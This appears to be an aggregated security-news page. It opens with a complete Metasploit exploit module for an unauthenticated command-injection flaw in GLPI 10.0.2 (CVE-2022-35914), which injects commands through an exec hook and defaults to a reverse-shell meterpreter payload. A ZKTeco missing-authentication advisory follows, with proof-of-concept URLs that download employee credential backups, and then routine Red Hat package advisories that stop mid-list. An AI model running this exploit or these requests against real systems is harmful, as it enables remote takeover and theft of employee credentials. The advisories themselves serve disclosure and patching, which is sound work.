This Metasploit module exploits an unauthenticated PHP command injection vulnerability in GLPI versions 10.0.2 and below to execute a command.

    ### This module requires Metasploit: https://metasploit.com/download# Current source: https://github.com/rapid7/metasploit-framework##class MetasploitModule < Msf::Exploit::Remote  Rank = ExcellentRanking  prepend Msf::Exploit::Remote::AutoCheck  include Msf::Exploit::Remote::HttpClient  include Msf::Exploit::CmdStager  def initialize(info = {})    super(      update_info(        info,        'Name' => 'GLPI htmLawed php command injection',        'Description' => %q{          This exploit takes advantage of a unauthenticated php command injection available          from GLPI versions 10.0.2 and below to execute a command.        },        'License' => MSF_LICENSE,        'Author' => [          'cosad3s', # PoC https://github.com/cosad3s/CVE-2022-35914-poc          'bwatters-r7' # module        ],        'References' => [          ['CVE', '2022-35914' ],          ['URL', 'https://github.com/cosad3s/CVE-2022-35914-poc']        ],        'Platform' => 'linux',        'Arch' => [ARCH_X64, ARCH_CMD],        'CmdStagerFlavor' => [ 'printf' ],        'Targets' => [          [            'Unix Command',            {              'Platform' => 'unix',              'Arch' => ARCH_CMD,              'Type' => :unix_cmd,              'DefaultOptions' => {                'PAYLOAD' => 'cmd/unix/python/meterpreter/reverse_tcp',                'RPORT' => 80,                'URIPATH' => '/glpi/'              }            }          ],          [            'Linux (Dropper)',            {              'Platform' => 'linux',              'Arch' => [ARCH_X64],              'DefaultOptions' => {                'PAYLOAD' => 'linux/x64/meterpreter/reverse_tcp',                'RPORT' => 80,                'URIPATH' => '/glpi/'              },              'Type' => :linux_dropper            }          ],        ],        'DisclosureDate' => '2022-01-26',        'DefaultTarget' => 0,        'Notes' => {          'Stability' => [ CRASH_SAFE ],          'Reliability' => [ REPEATABLE_SESSION ],          'SideEffects' => [ ARTIFACTS_ON_DISK, IOC_IN_LOGS ]        }      )    )  end  def populate_values    uri = "#{datastore['URIPATH']}/vendor/htmlawed/htmlawed/htmLawedTest.php"    begin      res = send_request_cgi({        'method' => 'GET',        'uri' => normalize_uri(uri),        'connection' => 'keep-alive',        'accept' => '*/*'      })      @html = res.get_html_document      @token = @html.at_xpath('//input[@id="token"]')['value']      vprint_status("token = #{@token}")      # sometimes I got > 1 sid.  We must use the last one.      @sid = res.get_cookies.match(/.*=(.*?);.*/)[1]      vprint_status("sid = #{@sid}")    rescue NoMethodError => e      elog('Failed to retrieve token or sid', error: e)    end  end  def execute_command(cmd, _opts = {})    populate_values if @sid.nil? || @token.nil?    uri = datastore['URIPATH'] + '/vendor/htmlawed/htmlawed/htmLawedTest.php'    send_request_cgi({      'method' => 'POST',      'uri' => normalize_uri(uri),      'cookie' => 'sid=' + @sid,      'ctype' => 'application/x-www-form-urlencoded',      'encode_params' => true,      'vars_post' => {        'token' => @token,        'text' => cmd,        'hhook' => 'exec',        'sid' => @sid      }    })  end  def check    populate_values if @html_doc.nil?    if @token.nil? || @sid.nil? || @html.nil?      return Exploit::CheckCode::Safe('Failed to retrieve htmLawed page')    end    return Exploit::CheckCode::Appears if @html.to_s.include?('htmLawed')    return Exploit::CheckCode::Safe('Unable to determine htmLawed status')  end  def exploit    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")    case target['Type']    when :unix_cmd      execute_command(payload.encoded)    when :linux_dropper      execute_cmdstager    end  endend

GLPI 10.0.2 Command Injection

ZKTeco ZEM500-510-560-760, ZEM600-800, ZEM720, and ZMM suffer from a missing authentication vulnerability. Versions below 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720) and 15.00 (ZMM200-220-210) are potentially affected.

    Advisory: Missing Authentication in ZKTeco ZEM/ZMM Web InterfaceThe ZKTeco time attendance device does not require authentication to use theweb interface, exposing the database of employees and their credentials.Details=======Product: ZKTeco ZEM500-510-560-760, ZEM600-800, ZEM720, ZMMAffected Versions: potentially versions below 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720) and 15.00 (ZMM200-220-210)Fixed Versions: firmware version 8.88 (ZEM500-510-560-760, ZEM600-800, ZEM720), firmware version 15.00 (ZMM200-220-210)Vulnerability Type: Missing AuthenticationSecurity Risk: mediumVendor URL: https://zkteco.eu/company/historyVendor Status: fixed version releasedAdvisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2021-003Advisory Status: publishedCVE: CVE-2022-42953CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-42953Introduction============"Time attendance and workforce management is an integrated set ofprocesses that an institution uses to optimize the productivity of itsemployees on the individual, departmental, and entity-wide levels.ZKTeco has been at the forefront of time attendance solutions for thelast 30 years, integrating advanced biometric technologies withinnovative and versatile terminals." (from company website)More Details============The ZKTeco ZEM/ZMM device allows to store a list of users and their credentialswhich may be used to log into the device to prove the users' attendance. Thesecredentials can either be a PIN, a card for a variety of card readers, or afingerprint. The user list can be managed through the web interface.When opening the web interface, for example on http://192.0.2.1/,the web server of the device sends a Set-Cookie header for a cookie withname and value similar to the following:-----------------------------------------------------------------------Set-Cookie: SessionID=1624553126; path=/;-----------------------------------------------------------------------It was determined that the value of the cookie is roughly the number ofseconds since January 1, 1970. Since the value has a constant offset,that might allow attackers to guess the cookie value. After setting thecookie, the webserver redirects the browser to "/csl/login". The loginform provided at this URL has its form action set to "/csl/check". Ifthe user provides wrong credentials, the web server responds with anerror message. If the user provides correct credentials, the serverresponds with a frameset.In this frameset various options are available, for example a user list.The list contains a link titled "Options" for each user item whichreferences a URL similar to the followinghttp://192.0.2.1/csl/user?did=0&uid=123Additionally, backups of all settings of the device can be downloadedfrom the backup page. The request to do so looks similar to thefollowing:-----------------------------------------------------------------------POST /form/DataApp HTTP/1.1Host: 192.0.2.1User-Agent: Mozilla/5.0Cookie: SessionID=1624553126Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencodedContent-Length: 7Origin: http://192.0.2.1Referer: http://192.0.2.1/form/Device?act=11style=1-----------------------------------------------------------------------When the value "1" is given for the field named "style", the web serverresponds with the file "device.dat" (corresponding to the option "BackupSystem Data" in the web interface), for all other values the serverresponds with the file "data.dat" (corresponding to the option "BackupUser Data" in the web interface). Both files can not only be requestedusing HTTP-POST, but also using HTTP-GET with the following URLs:http://192.0.2.1/form/DataApp?style=1http://192.0.2.1/form/DataApp?style=0Both files are - even though it's not obvious from the filename -compressed tar archives. They can be extracted in the following way:-----------------------------------------------------------------------$ mv data.dat data.tgz$ tar xvzf data.tgzrwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/group.datrwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/htimezone.datrwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/lockgroup.datrwxrwxrwx 500/513    10512 2021-06-23 07:23 mnt/mtdblock/ssruser.datrwxr-xr-x root/root 819896 2021-06-18 07:23 mnt/mtdblock/tempinfo.datrwxrwxrwx 500/513    19456 2005-05-05 07:05 mnt/mtdblock/template.datrw-r--r-- root/root 360448 2021-06-18 07:23 mnt/mtdblock/templatev10.datrwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/timezone.datrwxrwxrwx 500/513     1372 2005-05-05 07:25 mnt/mtdblock/user.datrwxr-xr-x root/root    120 1970-01-01 01:08 mnt/mtdblock/data/alarm.datrwxr-xr-x root/root      0 2021-06-23 09:55 mnt/mtdblock/data/extlog.datrwxr-xr-x root/root      0 2013-05-04 01:28 mnt/mtdblock/data/extuser.datrwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/data/group.datrwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/data/htimezone.datrwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/data/lockgroup.datrwxr-xr-x root/root  54800 2021-06-23 09:55 mnt/mtdblock/data/oplog.datrwxr-xr-x root/root  33200 2021-06-23 07:23 mnt/mtdblock/data/sms.datrwxr-xr-x root/root      0 2021-06-23 09:55 mnt/mtdblock/data/ssrattlog.datrwxr-xr-x root/root    660 2018-11-09 17:28 mnt/mtdblock/data/stkey.datrwxrwxrwx 500/513        0 2013-05-04 01:28 mnt/mtdblock/data/template.datrwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/data/timezone.datrwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/data/transaction.datrwxr-xr-x root/root    952 2021-06-23 07:24 mnt/mtdblock/data/udata.datrwxr-xr-x root/root      0 1970-01-01 01:08 mnt/mtdblock/data/user.datrwxr-xr-x root/root      0 2013-05-04 01:28 mnt/mtdblock/data/wkcd.dat-----------------------------------------------------------------------In this archive, the file "mnt/mtdblock/templatev10.dat" will likelycontain fingerprints, and the file "mnt/mtdblock/ssruser.dat" containsthe user database. The user database contains 72 byte user records, eachcontaining the privilege level, the PIN, the name of the user, datastored on external authentication tokens like cards, and the group ofthe user.While the cookie value might be guessable, it is not used forauthentication purposes. An attacker with knowledge of thecorresponding URLs could access the user detail view or the backupwithout any authentication.Proof of Concept================http://192.0.2.1/form/DataApp?style=1http://192.0.2.1/form/DataApp?style=0http://192.0.2.1/csl/user?did=0&uid=123Workaround==========Network access to the device should be limited to trustworthy persons.This might be hard to implement if the device is installed in a publicspace, especially if it is used for access control, too.Fix===Currently, it is not known whether a newer version might fix this issue.Due to the age of the product, the vendor might decide not to create afix at all.Security Risk=============Attackers with network access to a ZKTeco ZEM/ZMM time attendance devicecan get access to employee data, including the credentials used foraccessing the time attendance device. If these credentials are used forother purposes than time attendance, such as physical access control,attackers might use them to gain access to protected areas. The actualrisk estimate varies wildly with the kind of access control system inplace and whether network access to the device is prevented by othermeans, such as nearby security guards. For this reason, missingauthentication to the ZEM/ZMM web interface is estimated to pose a mediumrisk. This estimate might need to be adjusted to the specific use caseof the device.Timeline========2021-06-24 Vulnerability identified2021-07-12 Customer approved disclosure to vendor2021-07-16 Vendor notified2021-08-20 Vendor provides fixed firmware2022-09-29 Customer approved release of advisory2022-10-10 CVE ID requested2022-10-15 CVE ID assigned2022-10-24 Advisory publishedReferences==========https://zkteco.eu/company/historyRedTeam Pentesting GmbH=======================RedTeam Pentesting offers individual penetration tests performed by ateam of specialised IT-security experts. Hereby, security weaknesses incompany networks or products are uncovered and can be fixed immediately.As there are only few experts in this field, RedTeam Pentesting wants toshare its knowledge and enhance the public knowledge with research insecurity-related areas. The results are made available as publicsecurity advisories.More information about RedTeam Pentesting can be found at:https://www.redteam-pentesting.de/Working at RedTeam Pentesting=============================RedTeam Pentesting is looking for penetration testers to join our teamin Aachen, Germany. If you are interested please visit:https://jobs.redteam-pentesting.de/-- RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0Alter Posthof 1                           Fax : +49 241 510081-9952062 Aachen                    https://www.redteam-pentesting.deGermany                         Registergericht: Aachen HRB 14004Geschäftsführer:                       Patrick Hof, Jens Liebchen

ZKTeco ZEM500-510-560-760 / ZEM600-800 / ZEM720 / ZMM Missing Authentication

Red Hat Security Advisory 2022-7087-01 - 389 Directory Server is an LDAP version 3 compliant server. The base packages include the Lightweight Directory Access Protocol server and command-line utilities for server administration.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: 389-ds-base security and bug fix update  
Advisory ID:       RHSA-2022:7087-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7087  
Issue date:        2022-10-25  
CVE Names:         CVE-2022-2850  
====================================================================  
1. Summary:

An update for 389-ds-base is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client Optional (v. 7) - x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - x86_64  
Red Hat Enterprise Linux Server (v. 7) - ppc64le, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - x86_64

3. Description:

389 Directory Server is an LDAP version 3 (LDAPv3) compliant server. The  
base packages include the Lightweight Directory Access Protocol (LDAP)  
server and command-line utilities for server administration.

Security Fix(es):

* 389-ds-base: SIGSEGV in sync_repl (CVE-2022-2850)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

Bug Fix(es):

* Import may break replication because changelog starting csn may not be  
created (BZ#2113056)

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

After installing this update, the 389 server service will be restarted  
automatically.

5. Bugs fixed (https://bugzilla.redhat.com/):

2113056 - Import may break replication because changelog starting csn may not be created  
2118691 - CVE-2022-2850 389-ds-base: SIGSEGV in sync_repl

6. Package List:

Red Hat Enterprise Linux Client Optional (v. 7):

Source:  
389-ds-base-1.3.10.2-17.el7_9.src.rpm

x86_64:  
389-ds-base-1.3.10.2-17.el7_9.x86_64.rpm  
389-ds-base-debuginfo-1.3.10.2-17.el7_9.x86_64.rpm  
389-ds-base-devel-1.3.10.2-17.el7_9.x86_64.rpm  
389-ds-base-libs-1.3.10.2-17.el7_9.x86_64.rpm  
389-ds-base-snmp-1.3.10.2-17.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

Source:  
389-ds-base-1.3.10.2-17.el7_9.src.rpm

x86_64:  
389-ds-base-1.3.10.2-17.el7_9.x86_64.rpm  
389-ds-base-debuginfo-1.3.10.2-17.el7_9.x86_64.rpm  
389-ds-base-devel-1.3.10.2-17.el7_9.x86_64.rpm  
389-ds-base-libs-1.3.10.2-17.el7_9.x86_64.rpm  
389-ds-base-snmp-1.3.10.2-17.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
389-ds-base-1.3.10.2-17.el7_9.src.rpm

ppc64le:  
389-ds-base-1.3.10.2-17.el7_9.ppc64le.rpm  
389-ds-base-debuginfo-1.3.10.2-17.el7_9.ppc64le.rpm  
389-ds-base-libs-1.3.10.2-17.el7_9.ppc64le.rpm

x86_64:  
389-ds-base-1.3.10.2-17.el7_9.x86_64.rpm  
389-ds-base-debuginfo-1.3.10.2-17.el7_9.x86_64.rpm  
389-ds-base-libs-1.3.10.2-17.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

Source:  
389-ds-base-1.3.10.2-17.el7_9.src.rpm

ppc64:  
389-ds-base-1.3.10.2-17.el7_9.ppc64.rpm  
389-ds-base-debuginfo-1.3.10.2-17.el7_9.ppc64.rpm  
389-ds-base-devel-1.3.10.2-17.el7_9.ppc64.rpm  
389-ds-base-libs-1.3.10.2-17.el7_9.ppc64.rpm  
389-ds-base-snmp-1.3.10.2-17.el7_9.ppc64.rpm

ppc64le:  
389-ds-base-debuginfo-1.3.10.2-17.el7_9.ppc64le.rpm  
389-ds-base-devel-1.3.10.2-17.el7_9.ppc64le.rpm  
389-ds-base-snmp-1.3.10.2-17.el7_9.ppc64le.rpm

s390x:  
389-ds-base-1.3.10.2-17.el7_9.s390x.rpm  
389-ds-base-debuginfo-1.3.10.2-17.el7_9.s390x.rpm  
389-ds-base-devel-1.3.10.2-17.el7_9.s390x.rpm  
389-ds-base-libs-1.3.10.2-17.el7_9.s390x.rpm  
389-ds-base-snmp-1.3.10.2-17.el7_9.s390x.rpm

x86_64:  
389-ds-base-debuginfo-1.3.10.2-17.el7_9.x86_64.rpm  
389-ds-base-devel-1.3.10.2-17.el7_9.x86_64.rpm  
389-ds-base-snmp-1.3.10.2-17.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation (v. 7):

Source:  
389-ds-base-1.3.10.2-17.el7_9.src.rpm

x86_64:  
389-ds-base-1.3.10.2-17.el7_9.x86_64.rpm  
389-ds-base-debuginfo-1.3.10.2-17.el7_9.x86_64.rpm  
389-ds-base-libs-1.3.10.2-17.el7_9.x86_64.rpm

Red Hat Enterprise Linux Workstation Optional (v. 7):

x86_64:  
389-ds-base-debuginfo-1.3.10.2-17.el7_9.x86_64.rpm  
389-ds-base-devel-1.3.10.2-17.el7_9.x86_64.rpm  
389-ds-base-snmp-1.3.10.2-17.el7_9.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2022-2850  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY1fVL9zjgjWX9erEAQg0DQ//Uh4oKqFR0BFlXdN6MSE61+CSjdzBUIGb  
M5Y+3Gho1o+FjR1SEbWzlgP9KK5DSPNha+eImdF+LgwyPCzJU/fCkJBTNOWrVIP3  
Fd9reFgXM0MViMfrK9ZRKtRzHcq/hwDxAZEuJfilhfUiL0M4p9+dmsL+n+kEc1Th  
voK6bg7BpruAGC+S/+VSg4P4eO2/Rfm64Yf5GWsskJ2RhXAxMDzh0tXesF+vZ+Jc  
1Nt9XcxRES5pwIQMRB+yc98oBJpkVFImsbhX39ZCHFDIw+TBz6r9S9gg9UWKbuGd  
trQGi1Ztv647wrraJjgn9Lp+nHTzjrbq5a80bK24Ubbzvt/DMFPHytHBc95MZ7+i  
ycUhamzg3D/Ry1AhIsoJM74Saka4VwRrETFH/wWBldPrXl+05kfua0VkGGCE0177  
Czp3puLGJOOHQbydACjFAghUPV10JBOSnxsO5TtK9HG0VcerIPqaPejGNvuqFVjt  
mn6DRLx7/O9zqyISwFJZ8bNIrI0+qjDXZODTV9hI20wnzMkYZZ0iogXLnZjQgKd4  
Cc7ImS0eSohgfmpw0PFCFdZEAIk7BJaHSD0TfZxRbp3qiPppdjEU5lilLsUnoTKv  
bI6EyooCeq0bC7qQ+p8Do0szLUWJ/09tuC/bkTGx31mC2rp1ML9ISuQg3Xc06fv6  
6339t3e7Kdc=LyXG  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7087-01

Red Hat Security Advisory 2022-7108-01 - SQLite is a C library that implements an SQL database engine. A large subset of SQL92 is supported. A complete database is stored in a single disk file. The API is designed for convenience and ease of use. Applications that link against SQLite can enjoy the power and flexibility of an SQL database without the administrative hassles of supporting a separate database server. Issues addressed include a null pointer vulnerability.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Moderate: sqlite security update  
Advisory ID:       RHSA-2022:7108-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7108  
Issue date:        2022-10-25  
CVE Names:         CVE-2020-35525 CVE-2020-35527  
====================================================================  
1. Summary:

An update for sqlite is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Moderate. A Common Vulnerability Scoring System (CVSS) base score, which  
gives a detailed severity rating, is available for each vulnerability from  
the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux AppStream (v. 8) - aarch64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux BaseOS (v. 8) - aarch64, noarch, ppc64le, s390x, x86_64

3. Description:

SQLite is a C library that implements an SQL database engine. A large  
subset of SQL92 is supported. A complete database is stored in a single  
disk file. The API is designed for convenience and ease of use.  
Applications that link against SQLite can enjoy the power and flexibility  
of an SQL database without the administrative hassles of supporting a  
separate database server.

Security Fix(es):

* sqlite: Out of bounds access during table rename (CVE-2020-35527)

* sqlite: Null pointer derreference in src/select.c (CVE-2020-35525)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2122324 - CVE-2020-35525 sqlite: Null pointer derreference in src/select.c  
2122329 - CVE-2020-35527 sqlite: Out of bounds access during table rename

6. Package List:

Red Hat Enterprise Linux AppStream (v. 8):

aarch64:  
lemon-3.26.0-16.el8_6.aarch64.rpm  
lemon-debuginfo-3.26.0-16.el8_6.aarch64.rpm  
sqlite-analyzer-debuginfo-3.26.0-16.el8_6.aarch64.rpm  
sqlite-debuginfo-3.26.0-16.el8_6.aarch64.rpm  
sqlite-debugsource-3.26.0-16.el8_6.aarch64.rpm  
sqlite-libs-debuginfo-3.26.0-16.el8_6.aarch64.rpm  
sqlite-tcl-debuginfo-3.26.0-16.el8_6.aarch64.rpm

ppc64le:  
lemon-3.26.0-16.el8_6.ppc64le.rpm  
lemon-debuginfo-3.26.0-16.el8_6.ppc64le.rpm  
sqlite-analyzer-debuginfo-3.26.0-16.el8_6.ppc64le.rpm  
sqlite-debuginfo-3.26.0-16.el8_6.ppc64le.rpm  
sqlite-debugsource-3.26.0-16.el8_6.ppc64le.rpm  
sqlite-libs-debuginfo-3.26.0-16.el8_6.ppc64le.rpm  
sqlite-tcl-debuginfo-3.26.0-16.el8_6.ppc64le.rpm

s390x:  
lemon-3.26.0-16.el8_6.s390x.rpm  
lemon-debuginfo-3.26.0-16.el8_6.s390x.rpm  
sqlite-analyzer-debuginfo-3.26.0-16.el8_6.s390x.rpm  
sqlite-debuginfo-3.26.0-16.el8_6.s390x.rpm  
sqlite-debugsource-3.26.0-16.el8_6.s390x.rpm  
sqlite-libs-debuginfo-3.26.0-16.el8_6.s390x.rpm  
sqlite-tcl-debuginfo-3.26.0-16.el8_6.s390x.rpm

x86_64:  
lemon-3.26.0-16.el8_6.x86_64.rpm  
lemon-debuginfo-3.26.0-16.el8_6.x86_64.rpm  
sqlite-analyzer-debuginfo-3.26.0-16.el8_6.x86_64.rpm  
sqlite-debuginfo-3.26.0-16.el8_6.x86_64.rpm  
sqlite-debugsource-3.26.0-16.el8_6.x86_64.rpm  
sqlite-libs-debuginfo-3.26.0-16.el8_6.x86_64.rpm  
sqlite-tcl-debuginfo-3.26.0-16.el8_6.x86_64.rpm

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
sqlite-3.26.0-16.el8_6.src.rpm

aarch64:  
lemon-debuginfo-3.26.0-16.el8_6.aarch64.rpm  
sqlite-3.26.0-16.el8_6.aarch64.rpm  
sqlite-analyzer-debuginfo-3.26.0-16.el8_6.aarch64.rpm  
sqlite-debuginfo-3.26.0-16.el8_6.aarch64.rpm  
sqlite-debugsource-3.26.0-16.el8_6.aarch64.rpm  
sqlite-devel-3.26.0-16.el8_6.aarch64.rpm  
sqlite-libs-3.26.0-16.el8_6.aarch64.rpm  
sqlite-libs-debuginfo-3.26.0-16.el8_6.aarch64.rpm  
sqlite-tcl-debuginfo-3.26.0-16.el8_6.aarch64.rpm

noarch:  
sqlite-doc-3.26.0-16.el8_6.noarch.rpm

ppc64le:  
lemon-debuginfo-3.26.0-16.el8_6.ppc64le.rpm  
sqlite-3.26.0-16.el8_6.ppc64le.rpm  
sqlite-analyzer-debuginfo-3.26.0-16.el8_6.ppc64le.rpm  
sqlite-debuginfo-3.26.0-16.el8_6.ppc64le.rpm  
sqlite-debugsource-3.26.0-16.el8_6.ppc64le.rpm  
sqlite-devel-3.26.0-16.el8_6.ppc64le.rpm  
sqlite-libs-3.26.0-16.el8_6.ppc64le.rpm  
sqlite-libs-debuginfo-3.26.0-16.el8_6.ppc64le.rpm  
sqlite-tcl-debuginfo-3.26.0-16.el8_6.ppc64le.rpm

s390x:  
lemon-debuginfo-3.26.0-16.el8_6.s390x.rpm  
sqlite-3.26.0-16.el8_6.s390x.rpm  
sqlite-analyzer-debuginfo-3.26.0-16.el8_6.s390x.rpm  
sqlite-debuginfo-3.26.0-16.el8_6.s390x.rpm  
sqlite-debugsource-3.26.0-16.el8_6.s390x.rpm  
sqlite-devel-3.26.0-16.el8_6.s390x.rpm  
sqlite-libs-3.26.0-16.el8_6.s390x.rpm  
sqlite-libs-debuginfo-3.26.0-16.el8_6.s390x.rpm  
sqlite-tcl-debuginfo-3.26.0-16.el8_6.s390x.rpm

x86_64:  
lemon-debuginfo-3.26.0-16.el8_6.i686.rpm  
lemon-debuginfo-3.26.0-16.el8_6.x86_64.rpm  
sqlite-3.26.0-16.el8_6.i686.rpm  
sqlite-3.26.0-16.el8_6.x86_64.rpm  
sqlite-analyzer-debuginfo-3.26.0-16.el8_6.i686.rpm  
sqlite-analyzer-debuginfo-3.26.0-16.el8_6.x86_64.rpm  
sqlite-debuginfo-3.26.0-16.el8_6.i686.rpm  
sqlite-debuginfo-3.26.0-16.el8_6.x86_64.rpm  
sqlite-debugsource-3.26.0-16.el8_6.i686.rpm  
sqlite-debugsource-3.26.0-16.el8_6.x86_64.rpm  
sqlite-devel-3.26.0-16.el8_6.i686.rpm  
sqlite-devel-3.26.0-16.el8_6.x86_64.rpm  
sqlite-libs-3.26.0-16.el8_6.i686.rpm  
sqlite-libs-3.26.0-16.el8_6.x86_64.rpm  
sqlite-libs-debuginfo-3.26.0-16.el8_6.i686.rpm  
sqlite-libs-debuginfo-3.26.0-16.el8_6.x86_64.rpm  
sqlite-tcl-debuginfo-3.26.0-16.el8_6.i686.rpm  
sqlite-tcl-debuginfo-3.26.0-16.el8_6.x86_64.rpm

These packages are GPG signed by Red Hat for security.  Our key and  
details on how to verify the signature are available from  
https://access.redhat.com/security/team/key/

7. References:

https://access.redhat.com/security/cve/CVE-2020-35525  
https://access.redhat.com/security/cve/CVE-2020-35527  
https://access.redhat.com/security/updates/classification/#moderate

8. Contact:

The Red Hat security contact is <secalert@redhat.com>. More contact  
details at https://access.redhat.com/security/team/contact/

Copyright 2022 Red Hat, Inc.  
-----BEGIN PGP SIGNATURE-----  
Version: GnuPG v1

iQIVAwUBY1fUwNzjgjWX9erEAQjIgRAAnkS6X0WiZ/b6FSoOzquQzc4CykhFQj0q  
9kIzHH8S9jRl0Xa2v451Oe24VDEnIKxZ4+QY/CqpTc9YBq+d58s4ar/5xlyk1z5J  
mmm3dPvPfzP4q5lU1eqXJ6RjW3HKTKWj7dtan05fZZb8edv5pfY3cqbqkbb0vWzu  
5gS3fjTgwDO5CqgXAz8WG2jzrkmHY3AFjnxzP2c6OzkEG3qUMYHPslUeym2B6lqU  
g/9WQpT9LWV+oP4HXS/fiSA4FL2cT1s/DLxzdvZUTV9FNEQCRDTLhfL/XldIt4A2  
wcRb/2u2uctlW3stHKMX7l6qDkcZiQr2neGWGKC8rqoxwK/t9GaHpqgigTXQYcCg  
FSKSxtXnlsm+LxWyTCm+uIR98ZPHrUNgTRAW4/XKTseiHKxrbI1np2SbSpClCm/m  
rs0jFXLVZLOOdLERgPE7+heLLj/vE1m4K0DoaWrnQlARE3J0QWjVYRozrQ30aHVM  
AY+oLd0/W61PQ4rHYde7YUUVXqlfQ0hSxcc/sDTl0t31pQKiWY9QfLEMm/b2wJLt  
rF72sYfudyNLqpoMev50+a4EKJw4lFm3oveQemlmQps7GCJ9jVvov/bbTSQ8A0Ok  
Tpv7oWUvWCBWM3+6hecnaNIMszuBk1a4QPiSDLQ1Sf8OmHqFr41fWUzvWx3olaCE  
wnM6o9eWuhg=L2eT  
-----END PGP SIGNATURE-----  
--  
RHSA-announce mailing list  
RHSA-announce@redhat.com  
https://listman.redhat.com/mailman/listinfo/rhsa-announce

Red Hat Security Advisory 2022-7108-01

Red Hat Security Advisory 2022-7111-01 - Samba is an open-source implementation of the Server Message Block protocol and the related Common Internet File System protocol, which allow PC-compatible machines to share files, printers, and various information. Issues addressed include an information leakage vulnerability.

Red Hat Security Advisory 2022-7111-01

Red Hat Security Advisory 2022-7137-01 - This is a kernel live patch module which is automatically loaded by the RPM post-install script to modify the code of a running kernel. Issues addressed include privilege escalation and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

====================================================================                     
Red Hat Security Advisory

Synopsis:          Important: kpatch-patch security update  
Advisory ID:       RHSA-2022:7137-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2022:7137  
Issue date:        2022-10-25  
CVE Names:         CVE-2022-2588  
====================================================================  
1. Summary:

An update for kpatch-patch is now available for Red Hat Enterprise Linux 8.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux BaseOS (v. 8) - ppc64le, x86_64

3. Description:

This is a kernel live patch module which is automatically loaded by the RPM  
post-install script to modify the code of a running kernel.

Security Fix(es):

* a use-after-free in cls_route filter implementation may lead to privilege  
escalation (CVE-2022-2588)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2114849 - CVE-2022-2588 kernel: a use-after-free in cls_route filter implementation may lead to privilege escalation

6. Package List:

Red Hat Enterprise Linux BaseOS (v. 8):

Source:  
kpatch-patch-4_18_0-372_13_1-1-2.el8_6.src.rpm  
kpatch-patch-4_18_0-372_16_1-1-2.el8_6.src.rpm  
kpatch-patch-4_18_0-372_19_1-1-1.el8_6.src.rpm  
kpatch-patch-4_18_0-372_26_1-1-1.el8_6.src.rpm  
